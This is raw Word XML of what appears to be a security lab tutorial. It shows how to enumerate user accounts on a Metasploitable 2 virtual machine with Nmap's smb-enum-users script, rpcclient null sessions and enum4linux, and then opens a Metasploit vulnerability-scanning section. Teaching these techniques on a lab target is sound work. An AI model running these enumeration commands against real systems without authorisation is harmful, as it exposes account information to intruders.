        <w:t> </w:t>
      </w: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multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ways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enumerating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users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Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>system,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as:</w:t>
      </w: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201" w:after="0"/>
        <w:ind w:left="503" w:right="0" w:hanging="255"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Enumerating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Nmap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script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named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smb-enum-users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="504" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="171" w:after="0"/>
        <w:ind w:left="503" w:right="0" w:hanging="255"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Enumerating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users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through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null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session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using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rpclient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="39"/>
        </w:rPr>
      </w:pP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5" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Enumerating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="31"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="31"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="31"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>NMap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:ind w:left="185"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enumerate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accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>machine,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Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>smb-enum-users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>You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5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>run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NMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>script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command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/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697"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4121657" cy="4725162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657" cy="47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8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>CS-CNS-20010.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Nops.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9074" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="103"/>
        <w:ind w:right="203"/>
        <w:jc w:val="center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nmap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-script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smb-enum-users.nse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-p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445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[Metasploitable-2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IP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Address]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1"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="885" w:val="left" w:leader="none"/>
          <w:tab w:pos="886" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Enumerating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>sessions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rpcclient</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="132"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rpcclient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Linux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executing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>client-side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS-RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>functions.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null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>session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with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a samba or SMB server that does not require authentication with a password. No username or password is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>needed to set-up the connection, and therefore it is called a null session. The allowance of null sessions was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>enabled by default on legacy systems but has been disabled from Windows XP SP2 and Windows Server 2003.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5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>445,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/>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>port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out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>host,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we’ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>seen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port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="2"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Now you can open up a new terminal window and set up a null session with the Metasploitable 2 samba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using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following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9074" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="155"/>
        <w:ind w:right="203"/>
        <w:jc w:val="center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rpcclient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-U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""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[Metasploitable-2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IP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Address]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line="252" w:lineRule="auto" w:before="169"/>
        <w:ind w:left="185" w:right="388"/>
        <w:jc w:val="both"/>
      </w:pP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ask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password,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press</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>“enter”.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enumerate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all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users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system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9074" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="155"/>
        <w:ind w:right="203"/>
        <w:jc w:val="center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rpcclient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$&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-4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querydominfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun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rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="399"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
        <w:pict>
          <v:shape style="width:453.8pt;height:35.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#e5e5e5" stroked="false">
            <w10:anchorlock/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rpcclient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$&gt;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enumdomusers</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:left="398" w:right="296" w:hanging="399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rpcclient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$&gt;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queryuser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msfadmin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%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"queryuser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[username]"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query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particular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user</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="27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147" w:after="0"/>
        <w:ind w:left="746" w:right="0" w:hanging="562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Enumeration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with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enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="127"/>
        <w:ind w:left="185" w:right="388"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enum4linux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found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Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Linux.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enumerate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Windows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Samba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hosts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written</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Perl.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tool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basically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wrapper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smbclient,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>rpcclient,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>net,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nmblookup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Let’s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look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how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>enum4linux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Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Below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common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>options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enum4linux.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>get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overview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different</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>options,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use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-help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flag.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74.980003pt;margin-top:9.43791pt;width:453.8pt;height:155.450pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15713792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24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Usage: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./enum4linux.pl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[options]ip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48" w:lineRule="exact" w:before="222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-U</w:t>
                    <w:tab/>
                    <w:t>get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userlist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-M</w:t>
                    <w:tab/>
                    <w:t>get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machine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list*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-S</w:t>
                    <w:tab/>
                    <w:t>get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sharelist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-P</w:t>
                    <w:tab/>
                    <w:t>get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password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policy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information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-G</w:t>
                    <w:tab/>
                    <w:t>get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group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and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member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list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-d</w:t>
                    <w:tab/>
                    <w:t>be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detailed,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applies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-U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and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-S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-u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user</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="100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specify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username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(default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"")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pass</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="100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specify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password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(default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"")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-a</w:t>
                    <w:tab/>
                    <w:t>Do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all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simple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enumeration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(-U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-r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-o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-i).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-o</w:t>
                    <w:tab/>
                    <w:t>Get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information</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:tabs>
                      <w:tab w:pos="941" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="248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-i</w:t>
                    <w:tab/>
                    <w:t>Get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printer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information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39"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Now,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>you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5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>enum4linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploitable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options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tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="16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$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enum4linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-5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192.168.111.128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before="170"/>
        <w:ind w:left="484"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enum4linux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finished,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returns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information.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64.255997pt;margin-top:16.424282pt;width:475.2pt;height:4pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15713280;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="1285,328" coordsize="9504,80">
            <v:rect style="position:absolute;left:1285;top:328;width:1674;height:80" filled="true" fillcolor="#000000" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:line style="position:absolute" from="1285,333" to="10789,333" stroked="true" strokeweight=".498pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="588" w:val="left" w:leader="none"/>
          <w:tab w:pos="589" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="149" w:after="0"/>
        <w:ind w:left="588" w:right="0" w:hanging="404"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Usecase</w:t>
      </w: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124" w:after="0"/>
        <w:ind w:left="746" w:right="0" w:hanging="562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="21"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="127"/>
        <w:ind w:left="185" w:right="388"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In the Metasploit console, you can gather information, such as target IP address, Operating System, ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>opened, and vulnerability. Metasploit allows you to run Nmap directly from the console. Based on the infor-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>above,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>run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command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accomplish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information</w:t>
      </w:r>
